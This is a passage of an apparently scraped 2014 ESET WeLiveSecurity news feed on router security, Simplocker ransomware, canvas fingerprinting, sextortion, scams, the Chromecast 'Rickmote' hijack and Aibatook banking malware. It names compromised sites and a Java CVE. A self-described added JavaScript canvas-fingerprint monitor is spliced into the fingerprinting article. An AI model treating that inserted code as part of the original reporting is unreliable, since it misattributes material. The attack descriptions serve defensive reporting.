“Allow small business and home users to easily enable an open network, so guests and passers-by can get an Internet connection if they need one, while keeping a password-locked WPA2 network for themselves and their friends or coworkers.”

The project also aims to address problems with the security of common home routers – and the fact that their firmware is often updated slowly, or in some cases not at all. Some models even ship with known vulnerabilities - easy prey for attackers.

ESET Senior Research Fellow David Harley says that for many users, a few simple steps could enhance security – without having to grapple with complex software, or buy a new router. “Taking a few simple precautions would enhance security for quite a lot of home WiFi users – though I don’t have any statistics to say how many networks are relatively insecure.”

“The EFF project isn’t a bad idea – it proposes some useful measures – but right now it addresses a very small part of the problem and a small subset of knowledgeable users. In particular, it’s currently focused on a single router model, which isn’t going to save the world, though it probably won’t do Netgear any harm.”

Wi-Fi security – steps you can take now

A We Live Security video guide offers basic tips on how to secure home routers - and offers a good starting point for ensuring a Wi-Fi network isn’t vulnerable to snoopers and other unwanted ‘guests’.

Harley says, “Firstly, ensure your firmware is kept updated.” Firmware is the code and data which allows routers to function – similar in some ways to a computer operating system, but with the crucial difference that updates (to protect against bugs) often have to be installed manually.

Many users may be unaware that this is something they have to do – and routers tend to be long-lived devices, which can compound the problem. To update, you’ll need to find the router’s model number (usually marked on the unit), visit the manufacturer’s website, and see if there is a newer version. Download this to your PC or Mac, then access your router’s controls via its internal IP address (this is usually standard for each manufacturer, and available either in your manual, or via the manufacturer’s site).

Advanced users may want to try some of the existing replacements for router firmware. ESET Malware Researcher Olivier Bilodeau says “For the relatively advanced consumer: install an alternative open source firmware on your router.” These are replacement versions of the official firmware – and often more secure. This is not for beginner PC users, but clear instructions can be found online as to how to install.

Check your settings again

Changing passwords is an essential first step – but it’s worth checking back that your router’s settings haven’t changed, as this can be a problem with some models.

Harley says that users should always, “Change default router administrator usernames and passwords, and change the default SSID.” The SSID is the name of the network – which is broadcast to anywhere within Wi-Fi range. Leaving it as a default can broadcast information that is useful to an attacker – such as the model of router you are using, or whether you are using one supplied by your ISP. When choosing a new network name, avoid any personally identifying information such as your name or house number.

It’s worth considering making yours a “hidden network” – disabling the broadcast of the SSID’s name. That way you’re less visible to attackers – and to connect new devices, simply type in your network’s name on the gadget.

Harley warns that these precautions can be wasted if your router’s software is updated – which can occasionally revert settings to the default. “After any update, check these settings have not reverted,” he says.

WEP is not your friend

If your family or business has had the same router for a long time, you may be using WEP – an outdated form of encryption that can be cracked easily, even by unskilled hackers. Most new routers will use the more secure WPA2 standard – but if your router has been around for a while, it’s possible family members may have chosen WEP to connect older devices such as Nintendo’s first DS handheld. “Don’t use WEP encryption, if anyone still is,” Harley says. “If the router doesn’t allow anything else, time to change it. WPA2 is reasonably secure.”

Even if you’ve had trouble connecting mobile devices to a network, leaving it “open” is always a bad idea. Harley says, “If you’re not using encryption at all, fix it.”

Know who is connecting to your network

Harley says that controlling which devices can connect to a network offers another layer of reassurance. “MAC filtering reduces the risk from intruder machines using your network,” he says.

Any PC or mobile computing device has a unique identifying number known as a MAC address. If you access your router’s settings, you can select which devices can and cannot connect to your network – meaning for instance, a neighbor couldn’t log in, or a teenage visitor could not access unsuitable sites via a smartphone.

Add the MAC addresses of all authorized devices in the home – iPhones, tablets, laptops etc. – to the router’s authorized list. No other device will then be allowed on the network. You can find the MAC addresses of mobile phones and other portable devices under their network settings, though this will vary for each device. Check with the manufacturer.

The EFF hopes to develop a means to deliver updates to routers automatically, with firmware signatures fetched via the privacy-focused Tor service to prevent targeted attacks.

The project was launched by privacy and security group the Electronic Frontier Foundation, and is currently under test – the organization has invited hackers and researchers to “test, develop, improve and harden” the software, which will run on a popular Netgear Wi-Fi router.

Android/Simplocker using FBI child-abuse warnings to scare victims into paying $300
http://www.welivesecurity.com/2014/07/22/androidsimplocker/
Tue, 22 Jul 2014 12:12:31 +0000

Last time we wrote about Android/Simplocker – the first ransomware for Android that actually encrypts user files – we discussed different variants of the malware and various distribution vectors that we’ve observed. Android/Simplocker has proven to be an actual threat in-the-wild in spite of its weaknesses…

Last time we wrote about Android/Simplocker – the first ransomware for Android that actually encrypts user files – we discussed different variants of the malware and various distribution vectors that we’ve observed. What initially appeared as just a proof-of-concept – mainly because of Simplocker’s “not-exactly-NSA-grade” crypto implementation – has proven to be an actual threat in-the-wild in spite of its weaknesses. Also, the malware has been available for sale on underground forums.

Last week we spotted a variant of the ransomware that featured a few significant improvements.

[Screenshots: Simplocker FBI warning (1 and 2); Simplocker MoneyPak payment instructions (1 and 2)]

The first change that meets the eye in Android/Simplocker.I is that the ransom message is now in English rather than Russian. The victim is led to believe that the device was blocked by the FBI after detecting illegal activity – child pornography and so on – typical behavior of police ransomware that we’ve seen many times before. The demanded ransom is now 300 USD (as opposed to 260 UAH / 16 EUR / 21 USD) and the victim is instructed to pay it by a MoneyPak voucher. Like other previous Android/Simplocker variants, this one also uses the scareware tactic of displaying the camera feed from the device.

From a technical perspective, the file-encrypting functionality remains virtually unchanged, apart from using a different encryption key, but this recent Simplocker variant does contain two additional tricks to make the victim’s life more miserable.
[Screenshot: Simplocker code]
In addition to encrypting documents, images and videos on the device’s SD card, the trojan now also encrypts archive files: ZIP, 7z and RAR. This ‘upgrade’ can have very unpleasant consequences. Many Android file backup tools (which we strongly recommend, by the way) store the backups as archive files. In case the user has become infected with Android/Simplocker.I, these backups will be encrypted as well.

Secondly, the malware now asks to be installed as Device Administrator, which makes it a lot more difficult to remove. Legitimate Device Administrator applications use these extended permissions for various, mostly security-related reasons. For example, corporate Exchange administrators can enforce password policies, remotely wipe lost or stolen devices, and so on.

Android/Simplocker.I (and other Android ransomware in the past) only uses the functionality for its own protection, since the user must first revoke the application’s Device Administrator rights before uninstalling it. And that’s rather difficult to do when the ransomware is locking your screen.

[Screenshot: Simplocker masquerading as a Flash video player]

As usual, the trojan will use social engineering to trick the user into installing it – in the screenshot to the left it’s masquerading as a Flash video player.

Our Android/Simplocker detection statistics until today don’t indicate the threat to be widespread in English-speaking countries.

In case your files have been encrypted as a result of an Android/Simplocker infection, you can use the updated ESET Simplocker Decryptor to restore them. But as always, we recommend focusing on prevention ;) Also, while you should be careful when installing any application on your device, be extra careful when the installed application asks for Device Administrator rights.

SHA1 Hash: 72ec80b52ad38417240801dba1a730ab9804a2f9

Comic-Con 2014: Eight super-powered digital safety tips
http://www.welivesecurity.com/2014/07/22/comic-con-2014/
Tue, 22 Jul 2014 12:05:45 +0000

Over the past few years, Comic-Con has had over 130,000 attendees, and those attendees tend to be very digitally literate - so that means we will probably see double that number of connected devices - laptops, tablets, smartphones and perhaps even tricorders.

Like winter, Comic-Con 2014 is coming to San Diego. However, instead of bringing direwolves, white walkers, and the occasional dragon or three [or, at least, in addition to these], we can expect over 100,000 attendees to march on America’s Finest City between July 24-27, in search of not just comics, but such treasure as the latest in news on movies and books, not to mention a few collectible items of their favorite characters.

Over the past few years, Comic-Con has had over 130,000 attendees, and those attendees tend to be more digitally literate than other groups, so that means we will probably see well over double that number of connected devices in the form of laptops, tablets, smartphones and perhaps even tricorders. With that in mind, we have conjured up the following tips to keep your digital companions safe while in San Diego for Comic-Con 2014 (and possibly other parts of the multiverse as well)…

Comic-Con 2014: Safety tips

Tip # (there can be only) 1: Turn off Bluetooth, cellular, NFC and Wi-Fi radios on your tablets, smartphones, etc., when not in use. Not only will this save battery life, it will prevent unwanted connections from other devices. Also, be careful about using public Wi-Fi.

Tip # 2: Install anti-theft software on laptops, smartphones and tablets. That way, if your device gets lost, stolen or enters a pocket dimension, you have a better chance of recovering it.

Tip # 3: Password-protect and encrypt any computing devices you take with you. While this will not stop cat burglars, jewel thieves or plain old villainous scum from stealing them, it will help ensure your private information remains private, and choosing a strong password helps ensure it will take even the smartest android in Starfleet years, if not decades, to brute force or guess it. For tips on creating strong passwords, see this presentation on passwords and PINs.

Tip # (fantastic) 4: Upload any videos and pictures you have recorded on a daily basis, if not more frequently. That way, if your device gets lost or stolen, or the SD Card or drive fails, you will still have a copy of that favorite interview or awesome cosplay.

Tip # 5 (is alive): Even if your electronic devices are too big to fit into the hotel safe, their storage cards will fit, and some laptops even have hard disk drives that can be easily removed, too. If your hotel safe allows you to set a PIN to unlock it, see the presentation mentioned in tip #3, above, for a list of PINs not to use.

Tip # (sinister) 6: If you are buying collectibles with digital storage, such as USB flash drives, be sure autorun and autoplay are disabled on your computer before plugging them in, and prepare to format them the first time you use them. Better yet, since collectibles are always more valuable left in their original packaging, it might be best to leave them that way. Likewise, if you come across any USB flash drives, SD Cards or other media lying around, do not insert them into unsecured computers. It could be a trap! Turn them in to Lost and Found, instead.

Tip # 007: You might see a few public charging stations for smartphones and tablets. If you have brought your own AC adapter or a battery pack, it is safe to “top off” these devices from charging stations. But be wary of outlets providing USB connectors, which might be used to copy files off of your device or install unwanted programs.

Tip # 8 (bit): We estimate over an additional quarter of a million wireless devices will be in San Diego the week of Comic-Con, which means it is likely Internet connections, especially Wi-Fi and 3G/4G, will be slow. Be sure to update and patch your operating systems, perform full system backups and update your security software before you begin your quest.

Regardless of whether you are guarding the galaxy or merely intend to kick back, relax and take in the sights of Comic-Con 2014, here are some related articles you might find of interest from We Live Security:

And, from We Live Security’s sister site, GoExplore.Net:

You might also find the personal blog posts from ESET employees of use as well:

  • Homo Avionus – a blog dedicated to airplane travel by one of ESET’s frequent travelers
  • A dozen quick travel tips – an article with some tips and tricks on how to prepare for your trip

Lastly, I’d like to provide one little tip for those of you who might be flying into San Diego: if you get a window seat on the left side of the airplane, you’ll see ESET’s office just before you land. And, perhaps, if you stop by the office, we’ll have some special collectible items just for you.

In the meantime, we hope that you have the Best. Time. Ever. at Comic-Con!

Kudos to my fellow crime-fighters Bruce P. Burrell, Lysa Myers and Daniel Womack for their super-powered assistance with this article.
Aryeh Goretsky, MVP, ZCSE
Distinguished Researcher

Online privacy – millions spied on by “unblockable” ad-snooper
http://www.welivesecurity.com/2014/07/22/online-privacy/
Tue, 22 Jul 2014 11:58:49 +0000

A new kind of web tracking tool bypasses the protections privacy-conscious web users rely on and is already being used to track users across thousands of sites - without users being aware of it.

A new, invisible web tracking tool bypasses the protections privacy-conscious web users rely on (including browser privacy settings, do-not-track instructions, or tools such as AdBlock Plus) and is already being used by thousands of sites – without visitors being aware, as reported by Pro Publica.

A single company which uses the ‘fingerprinting’ technique, touted as a replacement for cookies for advertisers, uses its scripts in thousands of sites including Whitehouse.gov – and reaches 97.2% of the internet-using population in the U.S., according to Comscore.

The technique, known as “canvas fingerprinting”, covertly requires browsers to “draw” a short message (the user does not see this, and is not made aware of it) – and subtle differences in the way machines render the text make it easy to identify the machine, even if the user is employing cutting-edge online privacy tools, Network World reports.

The unique code can then be used to track users across sites to serve adverts, even if the user employs online privacy tools to prevent this.

Online privacy – defenses “shattered”

Princeton University researchers found that the technique, which works in “a fraction of a second without user’s awareness” was not only theoretically possible – but already in use on more than 5% of the 100,000 sites under test.

“By crawling the homepages of the top 100,000 sites we found that more than 5.5% of the crawled sites include canvas fingerprinting scripts,” the researchers write. “Although the overwhelming majority (95%) of the scripts belong to a single provider (addthis.com), we discovered a total of 20 canvas fingerprinting provider domains, active on 5542 of the top 100,000 sites.”

“Our evaluation of the defensive techniques used by privacy-aware users finds that there exist subtle pitfalls such as failing to clear state on multiple browsers at once in which a single lapse in judgement can shatter privacy defenses,” the Princeton researchers write in an upcoming paper entitled The Web Never Forgets.

Many of the sites employing “canvas fingerprinting” were using scripts from a single provider – AddThis, which began testing the scripts in January 2014, according to the researchers. But AddThis is not alone – sites such as dating service PlentyOfFish also employ the technology.

The researchers suggest that by correlating this information with identifying information provided by cookies, advertising companies are actually “advancing technology beyond the scientific literature.”

AddThis in particular employs techniques more advanced than those detailed in previous scientific papers.

“By requesting a non-existent font, the test tries to employ the browser’s default fallback font. This may be used to distinguish between different browsers and operating systems,” the researchers write. “This has serious implications for any web user wishing to avoid being tracked – and to avoid “personalised” adverts. Even sophisticated users face great difficulties in evading tracking techniques.”

“According to a recent ComScore report, AddThis solutions ‘reaches 97.2% of the total Internet population in the United States and get 103 billion monthly page views’,” the researchers write.

Online privacy – protect yours

Blocking canvas fingerprinting is not easy, the researchers admit – there are solutions, but these involve radical changes to the browsing experience.

The privacy focused browser Tor offers a function which notifies users when a script requests a canvas fingerprint – but as Pro Publica warns, this can be slow.

Pro Publica offers advice on how to protect against the technique, with methods such as disabling JavaScript, which can cause many websites to stop working properly. Other methods include manually blocking known fingerprinters. The full guide can be read here.
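
The notification that the Tor browser offers, described above, amounts to hooking the canvas read methods and reporting reads that look like a fingerprint. The following is an added example of such a monitor; it is not code from the article, from the Princeton paper or from any browser vendor. It wraps the text-drawing and pixel-reading methods on the canvas prototypes and reports a read only when text was drawn first and the read covers at least 16x16 pixels; that threshold and the “text first” rule are simplified assumptions modelled on the paper’s criteria, and the stub canvas classes and four simulated page behaviours are constructed so the monitor runs offline under Node.js. In a browser the same function is installed on HTMLCanvasElement.prototype and CanvasRenderingContext2D.prototype.

```javascript
// Added example: a canvas-read monitor of the kind a privacy tool installs to report
// fingerprinting. Not code from the article, the Princeton paper or any browser vendor.
// Threshold (16 px) and the "text drawn before read" rule are simplified assumptions.

function installCanvasMonitor(canvasProto, contextProto, onSuspect) {
  const drewText = new WeakSet(); // canvases on which fillText/strokeText was called
  const findings = [];            // everything reported, for later inspection

  // Attribution: the stack frame above the wrapper. In a browser this is the calling
  // script's URL, which is how a tracker domain gets named in a report.
  function callerHint() {
    const frames = (new Error().stack || '').split('\n').slice(1).map(s => s.trim());
    return frames[3] || 'unknown';
  }

  function report(method, canvas, width, height) {
    if (!drewText.has(canvas) || width < 16 || height < 16) return; // not fingerprint-like
    const finding = { method, width, height, source: callerHint() };
    findings.push(finding);
    onSuspect(finding);
  }

  for (const name of ['fillText', 'strokeText']) {
    const orig = contextProto[name];
    contextProto[name] = function (...args) {
      if (this.canvas) drewText.add(this.canvas); // context.canvas is the owning element
      return orig.apply(this, args);
    };
  }

  // getImageData reads the requested rectangle: arguments are (x, y, width, height)
  const origGetImageData = contextProto.getImageData;
  contextProto.getImageData = function (...args) {
    report('getImageData', this.canvas, args[2], args[3]);
    return origGetImageData.apply(this, args);
  };

  // toDataURL serialises the whole canvas
  const origToDataURL = canvasProto.toDataURL;
  canvasProto.toDataURL = function (...args) {
    report('toDataURL', this, this.width, this.height);
    return origToDataURL.apply(this, args);
  };

  return findings;
}

// Constructed stand-ins for the browser canvas objects (assumption: just enough of the
// API for the monitor to run under Node.js; nothing is actually rendered).
class StubContext {
  constructor(canvas) { this.canvas = canvas; }
  fillText() {}
  strokeText() {}
  getImageData(x, y, w, h) { return { width: w, height: h, data: new Uint8ClampedArray(w * h * 4) }; }
}
class StubCanvas {
  constructor(width, height) { this.width = width; this.height = height; this.ctx = new StubContext(this); }
  getContext() { return this.ctx; }
  toDataURL() { return `data:image/png;base64,stub-${this.width}x${this.height}`; }
}

// Four constructed page behaviours: a fingerprinter (draw a pangram, read back), a chart
// that only renders, a 1x1 canvas read (below threshold) and a pixel read with no text.
function simulate() {
  const reported = [];
  const findings = installCanvasMonitor(StubCanvas.prototype, StubContext.prototype,
                                        f => reported.push(f));

  const fp = new StubCanvas(220, 30);
  fp.getContext('2d').fillText('Cwm fjordbank glyphs vext quiz', 2, 15);
  fp.toDataURL();                                    // reported: text drawn, then read

  const chart = new StubCanvas(400, 300);
  chart.getContext('2d').fillText('Sales 2014', 10, 10); // rendering only, never read

  const tiny = new StubCanvas(1, 1);
  tiny.getContext('2d').fillText('.', 0, 0);
  tiny.toDataURL();                                  // 1x1: below the 16 px threshold

  const photo = new StubCanvas(100, 100);
  photo.getContext('2d').getImageData(0, 0, 50, 50); // no text drawn: not reported

  return { findings, reported };
}

if (typeof require !== 'undefined' && require.main === module) console.log(simulate().findings);
```

Only the first canvas is reported: it is the one that draws text and then reads the pixels back at a size large enough to carry a fingerprint. The monitor deliberately stays silent on canvases that are only rendered, which is what keeps a notification of this kind from firing on every chart or game.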

‘Sextortion’ blackmail attacks on the rise, Police warn
http://www.welivesecurity.com/2014/07/21/sextortion/
Mon, 21 Jul 2014 14:43:24 +0000

‘Sextortion’ attacks, where cybercriminals blackmail victims with the threat of exposing explicit photographs or messages, are becoming increasingly common, according to a report by Bloomberg News.

The FBI has issued warnings that sextortion is on the rise – with attackers using methods including searching stolen computer equipment for explicit imagery, hacking social media accounts and using malware to steal images from computers.

Bloomberg describes one case in which a young mother (name withheld) was driven to suicide, and interviewed a New Hampshire woman whose suffering at the hands of a “sextortionist” left her feeling traumatised two years later.

Previous reports have highlighted cases in which children were targeted and blackmailed into uploading further naked pictures, which were then traded among paedophiles online.

Sextortion is ‘growing problem’

“This is a growing problem,” said Wesley Hsu, chief of the cyber crimes unit at the U.S. Attorney’s Office in Los Angeles. Hsu says that the threat of exposure in sextortion attacks is particularly distressing as the internet is “quite permanent”.

Bloomberg reports that at least 20 criminals have been prosecuted for such scams – with victims thought to number in the thousands. The FBI has previously warned of a growing number of criminals involved in “sextortion”.

How to avoid falling prey to sextortion

ESET security researcher Lysa Myers offers tips on how to avoid falling prey to sextortion – saying that criminals may try to befriend victims and trick them into sharing pictures, or may use malware to target victims’ webcams and take pictures themselves.

“There are two types of behaviors that are used in this crime,” Myers writes. “Trust-based tactics where the criminals take advantage of the relative anonymity of the Internet to trick victims into trusting them and revealing very personal details or sending revealing images. The criminals then use these as leverage to force their victims into sending more compromising pictures.”

Criminals also target victims with malware designed specifically for this form of attack, Myers says: “Malware-based attacks target the victim with malware that stealthily turns on the victim’s webcam. In this case the victim herself unwittingly provides revealing images that the criminal can use for blackmail to get the victim to provide yet more compromising pictures.”

Often, attackers use the threat of exposure to harvest more explicit pictures, and the FBI warns the tactic is often used against teenage girls. In one case, 25-year-old Brian Caputo has been indicted for an alleged eight-year campaign in which he targeted young females via social sites and traded hundreds of explicit images with others on child pornography websites.

The FBI said, “Caputo convinced one minor female to take and then upload more than 660 sexually explicit images of herself to a Dropbox account controlled by Caputo. When agents executed a search warrant at his residence in Arvin on February 28, 2014, Caputo’s cell phone contained hundreds of images of girls ages 11-15 undressing, nude, or engaging in sexually explicit conduct. Caputo then traded the images with other Internet users.”

Predatory scammers also target victims via dating sites – where the scammer trades pictures with a victim, then threatens them with exposure. Even explicit messages can leave daters open to this form of attack.

Dating scams are one of the fastest-growing areas of fraud online, with a 27% rise year-on-year reported in the UK. The FBI issued an official warning this year, saying that women over 40 were particularly at risk.

“Their most common targets are women over 40, who are divorced, widowed, and/or disabled, but every age group and demographic is at risk,” the FBI said. “Here’s how the scam usually works. You’re contacted online by someone who appears interested in you. He or she may have a profile you can read or a picture that is emailed to you.”

Mark Brooks of Online Personals Watch offers tips on how to spot fake profiles on dating sites – and avoid being conned out of money, or threatened with exposure online.

Insider threat – should you worry about the ‘enemy within’?
http://www.welivesecurity.com/2014/07/21/insider-threat/
Mon, 21 Jul 2014 14:06:49 +0000

Disgruntled employees and other malicious insiders could be one of the most serious security threats companies face – but the importance of the threat from the ‘enemy within’ varies according to who you ask.

A survey of IT security professionals at this year’s Infosecurity Europe trade event found that a fifth (20%) of organizations believe that insider threats pose the most serious threat to corporate security, according to Information Age.

A parallel survey of IT professionals at the RSA conference found that the largely U.S. group surveyed believed that outsiders posed a far more serious threat than insiders: just 5% of respondents blamed insiders.

Insider threat – a real danger?

Fudzilla reports that nearly two thirds of U.S. professionals regarded outside criminal groups as the biggest threat faced by companies – versus 35% in the UK.

Both groups agreed that employee error and ignorance posed a serious threat to organizations – with 44% of Infosec attendees believing that human error is the most frequent point of failure faced by organizations, along with 33% of those surveyed at RSA.

Both groups were in agreement that employees, rather than technology, were the weak spot in company security systems – with 70% of UK respondents and 71% of US respondents saying that ‘people’ were the weak link in corporate systems.

Human error

ESET Senior Research Fellow David Harley said, “I’d have to agree that a very high proportion of security breaches are caused directly or indirectly by people inside an organization, whether it’s a matter of human error, susceptibility to social engineering, bad security management decisions, and so on. I’m not convinced that deliberate malicious action from insiders outweighs all those other factors.”

Both groups cited malware as the most dangerous attack vector, combined with the use of social engineering – and AppRiver, the specialist app security company which conducted the surveys, said that companies had seen a “dramatic increase” in phishing attacks.

“Whilst the US blames external influences, the UK recognises it is their own people who can act as the weakest link in an organisation’s IT security posture – with ignorance the overarching driver. While it’s hard to plan for ignorance, the combination of education and automation would certainly help mitigate most non-malicious threats especially as many IT professionals have faith in the technology they’re deploying,” said Troy Gill, senior security analyst of AppRiver.

Facebook scams target grieving families of Flight MH17
http://www.welivesecurity.com/2014/07/21/facebook-scams/
Mon, 21 Jul 2014 13:49:47 +0000

Callous cybercriminals have used the Malaysia Airlines Flight MH17 tragedy as a lure for Facebook scams – creating fake profiles for victims of the crash, including children, according to the Daily Mail’s report.

The fake Facebook scam profiles have since been closed down by Facebook, IB Times reports – but are part of a disturbing trend where criminals attempt to make money out of grieving families, Mashable reports.

Facebook scam pages were set up for at least five Australian citizens, including three children, and for nationals of other countries including Americans and Britons.

Facebook scams target victims

The pages appear to have been created with the goal of driving friends, curious browsers and relatives towards dubious sites – including video “news” showing the moment of the crash.

The Canberra Times reports that the fake profiles all contained links to a single blog site which purported to offer information on the crash. Instead, the site bombarded users with pop-up adverts for online gambling sites and get-rich-quick schemes.

One of the links purported to direct users to a video showing the moment of the crash, entitled “Video Camera Caught the moment plane MH17 Crash over Ukraine. Watch here the video of Crash.” This tactic is becoming depressingly common in the wake of tragedies – We Live Security offers a guide to spotting scam news stories, and why clicking on the link is never advisable.

Alistair MacGibbon of the University of Canberra said that the criminals would hope to make money for referring victims to unscrupulous sites – and that the practice was increasingly common.

“Crooks are super-fast these days at picking up on anything that’s remotely topical, and working out how to monetise it from a criminal point of view,” he said. “It’s a really distasteful trend.”

Facebook scams – “distasteful trend”

IB Times reports that while Facebook has rapidly removed false profiles, scams continue to circulate, including fake “news” shared via Twitter.

Scammers often target Facebook with copies of news stories or viral content – or entirely fake, sensational videos, such as ‘Giant Snake Swallows Zookeeper’, as reported by We Live Security this year.

ESET researcher Stephen Cobb offers a We Live Security Guide to spotting Facebook scams, “Can we trust our friends not to make questionable decisions on social media? Apparently not, because our friends might actually be scammers in disguise, or just not well-informed.”

In many cases, scam videos will install a ‘rogue’ Facebook app to spread rapidly via the network but such scams can also lead to tainted sites which infect users with malware.

Smart Phone, Safe Car? (podcast)
http://www.welivesecurity.com/podcasts/smart-phone-safe-car/
Fri, 18 Jul 2014 21:17:00 +0000

Wi-Fi security alert on Chromecast as ‘Rickmote’ hijacks nearby boxes
http://www.welivesecurity.com/2014/07/17/wi-fi-security/
Thu, 17 Jul 2014 13:44:37 +0000

A security researcher has built a remote control which hijacks any nearby Chromecast, highlighting a Wi-Fi security issue which allows an attacker to play a ‘surprise’ video on nearby gadgets.

Concern has risen over Google’s popular Chromecast TV streamer’s Wi-Fi security, after a security researcher unveiled a ‘Rickmote’ remote control which hijacks any nearby Chromecast via Wi-Fi (without requiring a password), and plays the timeless internet joke/Eighties pop staple Never Gonna Give You Up by Rick Astley on a loop.

The ‘Rickmote’ device has a large orange button emblazoned with Rick Astley’s face, and hijacks the popular Google TV dongle via its simplified Wi-Fi connection, according to PC World. The result is the familiar video playing on a loop: the ‘rickroll’, a meme in which web users tricked one another into following links to it.

More details of the hack are to be revealed soon, but its creator says that it could be used for more damaging purposes than tormenting neighbours with Eighties pop.

The gadget is based on the popular Raspberry Pi mini-computer, a hit with DIY computing enthusiasts, and was created by security researcher Dan Petro of the consultancy Bishop Fox.

Wi-Fi security hack explained

Petro wrote in a blog post this week, “How is it possible to hijack unsuspecting Chromecast users’ TVs, turning their “Game of Thrones” marathon into a 1980s flashback? The Rickmote accomplishes this by briefly disconnecting nearby Chromecasts from their Wi-Fi.”

“When this loss of connectivity occurs, the Chromecast tries to reconfigure and accepts commands from anyone within proximity. The Rickmote automatically provides this configuration in the form of everyone’s favorite Rick Astley song on loop.”

Rickmote – passwords at risk?

The hack takes around 30 seconds, but all Chromecasts within Wi-Fi range are vulnerable, and users could in theory play any video, not just the traditional Never Gonna Give You Up, according to a report in Wired.

Petro says that he discovered a further bug in Chromecast which may make it possible for an attacker to extract a home’s Wi-Fi password – potentially a much more serious Wi-Fi security concern.

“This is actually a really hard problem, and it’s not clear that it’s ever going to get fixed,” Petro said.

Google has provided no comment on the issue at time of writing. Further video evidence is available via this link.

Petro is due to disclose further details of the hack, and the device at Black Hat Tools Arsenal USA on August 6, where he promises to show off a step-by-step guide to turning a Raspberry Pi into an automated Chromecast hacker which rickrolls all boxes within Wi-Fi range.

Router attacks: Five simple tips to lock criminals out (video)
http://www.welivesecurity.com/videos/router-attacks-five-simple-tips-lock-criminals/
Wed, 16 Jul 2014 14:57:23 +0000

Cyber criminals are constantly targeting home routers and it’s becoming increasingly difficult to keep them secure. Follow these 5 simple tips from We Live Security to lock criminals out.

Privacy concerns over Police ‘instant ID’ camera trial
http://www.welivesecurity.com/2014/07/16/privacy/
Wed, 16 Jul 2014 14:50:38 +0000

New facial recognition technology which can instantly identify people from any digital image in seconds is being trialled in the UK for the first time.

Leicestershire Police has become the first UK force to trial NEC’s NeoFace software – and say it will be used on CCTV and body camera footage, according to The Next Web’s report. Privacy groups such as Britain’s Big Brother Watch have raised concerns over the technology – saying it represents the “next level” of surveillance, according to the BBC’s report.

Under UK law, the software’s identification is inadmissible in a court of law, but Leicestershire police say that it can save time searching for potential matches for faces. At present, the British force performs the searches manually.

In America, Neoface has been used to convict an armed robber in Chicago, which has 22,000 cameras linked to the software, according to Engadget’s report. Pierre D Martin was sentenced to 22 years in prison earlier this year.

Privacy group warns of ‘next level’ of surveillance

Leicestershire police said that early trials of the system offered a high success rate, and dismissed concerns over privacy, saying that their image database consisted of people .

Chief Inspector Chris Cockerill said: “We’re very proud to be the first UK Police force to evaluate this new system. Initial results have been very promising and we’re looking forward to seeing what can be achieved throughout the six month trial.”

Identity unit Manager Andy Ramsay said: “We have over ninety-thousand photos on our system and Neo-Face can compare someone’s image against our complete databases in seconds. Besides the speed it’s also impressive because it can even find family members related to the person we’re trying to identify.”

22 years in jail

Earlier this year, the biometric facial recognition software was used to convict an armed robber, with a Chicago criminal “matched” from CCTV footage to a mug shot, and sentenced to 22 years in prison, according to the Chicago Sun-Times.

Sky News said that the case marked the first conviction obtained using NeoFace – face-recognition software purchased by the Chicago Police Department for $5.4m.

Engadget points out that the case has eerie echoes of the videogame Watch Dogs – a cybercrime-heavy science fiction hit inspired in part by Chicago’s use of 22,000 face-recognition cameras. We Live Security took a look at the realism (or otherwise) of the game’s world of all-seeing cameras and super-powered smartphone apps in this feature.

The software used to “match” Martin’s image to a database of several million police mugshots was made by NEC, according to Silicon Republic’s report. The software has also been bought by other police departments, and by businesses wishing to keep track of customers via CCTV, the site reported.

Further We Live Security stories dealing with the emerging technology can be found here.

Hacked Japanese porn sites spread banking malware attack
http://www.welivesecurity.com/2014/07/16/hacked-japanese-porn-sites/
Wed, 16 Jul 2014 11:41:49 +0000

Thinking of spending some time perusing Japanese porn websites before you do your online banking?

You might want to think again.

Security researchers at ESET have published a detailed analysis of an organised malware campaign that stole the login credentials of online banking customers after infecting PCs that had visited X-rated Japanese websites.

ESET’s team of experts have taken a close look at the Win32/Aibatook malware that targets users of Internet Explorer who are customers of Japanese banks, and in particular visitors to some of the country’s most popular pornographic websites:

sokuhabo.net
www.uravidata.com
ppv.xxxurabi.com
mywife.cc

Upon visiting any of the above compromised sites, users can be redirected to an exploit page that attempts to take advantage of Java vulnerability CVE-2013-2465.

Of course, it’s important to point out that any website can potentially be compromised, and be running malicious code designed to infect a visiting computer. It’s not the case that an adult website is necessarily more dangerous to your computer’s health than, say, the website belonging to a major American television network or a website devoted to a programming language.

But criminals eager to break into bank accounts certainly have no qualms about hacking porn websites, in the knowledge that they are likely to receive lots of traffic (and hence guaranteed to generate more victims).

It is perhaps unusual, however, to see only one single vulnerability exploited – rather than the more common approach used by cybercriminals today to use an exploit kit to attempt a battery of attacks against visiting computers, hoping to find one which hits the bullseye.

Regardless, the criminals clearly think that their approach works well enough, and an unassuming 404 error message is displayed when the user’s browser is redirected to a third-party website.

Error message or exploit?

The 404 “Page not found” error message may seem unassuming enough to the casual observer, but a quick look at the webpage’s source code reveals that it is more than a simple error page – and secretly harbours code to run a malicious Java applet.

[Image: source code of the fake 404 page]

In a seeming attempt to avoid detection, the code contains a counter which appears to be designed to only insert the snippet of HTML for a limited number of victims each day.

With the malware now in place, it can begin to do the rest of its dirty work – waiting for victims to log into online banks with Internet Explorer (the most widely-used browser in Japan) and inject bogus forms into the process.

[Image: bogus form injected into the Japan Post bank login page]

In the above example, the Aibatook malware has silently injected a false login page as a user visits the Japan Post bank, requesting that they fill in their personal details because of a system upgrade.

Stolen data is then sent to the criminals via a C&C (Command and Control) server.

Craftily, if the user visits a page on the Japan Post website designed to warn customers of the dangers of phishing attacks they are redirected back to the login page before they have a chance to see any security advice.

In recent months, those responsible for the Aibatook attack have created new versions of the malware, capable of stealing credentials from users of web-hosting services and domain resellers, and switching from Delphi to C++ as their programming language of choice.

In all, customers of over 90 websites are thought to be being targeted by the information-stealing criminals.

Java vulnerability to blame

The Java vulnerability exploited by the attacks was patched by Oracle back in June 2013.

In an ideal world you would hope that because a fix was available for the vulnerability, no one would have still been falling foul of the attack in the months since. However, it’s clear that many computer users are not protecting their computers with the latest security patches – giving online criminals a larger window of opportunity to infect PCs and steal money from online accounts than they could hope for in their wildest dreams.

The simple truth is that when computer users fail to keep their systems updated with security patches they are exposing themselves to greater risk, and making life easier for malicious hackers.

Computer users should also consider carefully what other steps they are taking to minimise the attack surface.

Just about every piece of software you run on your computer has vulnerabilities – whether they be known or unknown. Most, hopefully, are not serious and cannot be easily exploited by hackers.

But every additional piece of code or functionality that you enable on a PC increases the potential risk. A smaller attack surface makes the exploitation of vulnerabilities more difficult, and so will help mitigate risk.

